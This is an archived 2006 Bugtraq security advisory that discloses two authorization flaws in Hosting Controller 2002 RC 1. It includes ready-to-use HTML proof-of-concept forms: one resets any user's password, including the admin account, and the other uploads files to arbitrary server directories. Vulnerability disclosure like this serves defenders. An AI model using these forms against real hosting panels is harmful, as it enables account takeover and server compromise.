lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060402171842.19742.qmail@securityfocus.com>
Date: 2 Apr 2006 17:18:42 -0000
From: paolo.difebbo@...il.com
To: bugtraq@...urityfocus.com
Subject: Hosting Controller AccountActions.asp and saveuploadfiles.asp
 vulns (PoC)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,
i've found 2 vulnerabilities in Hosting Controller that allows remote
authenticated users to change every user password or upload files in every
directory. Here are the PoC:

This allows to modify passwords:
<form
action="http://[URL]/admin/accounts/AccountActions.asp?ActionType=UpdateUser
"
method="post">
Username: <input name="UserName" value="hcadmin"
type="text" size="50">
<br>
Name: <input name="FullName" value="g|25|h"
type="text" size="50">
<br>
ChangePass (type true): <input type="checkbox" name="PassCheck"
value="TRUE">
<br>
Password: <input name="Pass1" title="Password">
<br>
Confirm: <input name="ConfPass" title="Password">
<br>
<input name="submit" value="submit" type="submit">

</form>
<br>
PS: You should have authenticated access.<br>
<br>
- -------------------------<br>
Vulnerable versions:<br>
- - HC 2002 RC 1<br>
Other versions may be vulnerable


And this allows to upload:
<form method="POST" action="http://[URL]/admin/folders/saveuploadfiles.asp"
enctype="multipart/form-data">
Where upload files: <input name="OpenPath" value="E:\webspace\test">
<br>
File 1: <input type="file" name="file1" value><br>
File 2: <input type="file" name="file2" value><br>
File 3: <input type="file" name="file3" value><br>
File 4: <input type="file" name="file4" value><br>
<input type="submit" value="Upload Files" name="upload"><br>
<br><br>
PS: If you see an error message, it's not important. You just should have
authenticated access.
</form>
<br>

- -------------------------<br>
Vulnerable versions:<br>
- - HC 2002 RC 1<br>
Other versions may be vulnerable

This vulns are tested with HC 2002 RC 1, but other versions may be
vulnerable.


Sorry for my english, but i'm Italian.

-----BEGIN PGP SIGNATURE-----
Version: 6.5.8ckt http://www.ipgpp.com/

iQA/AwUBRC/pBBMZt0KZeGPOEQK5lwCg13JhLH6ghgWoO8zUSG5EUZpmwtwAmwdh
KUkiwb7H3FkEdfZcORRpl4LH
=qlwF
-----END PGP SIGNATURE-----


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ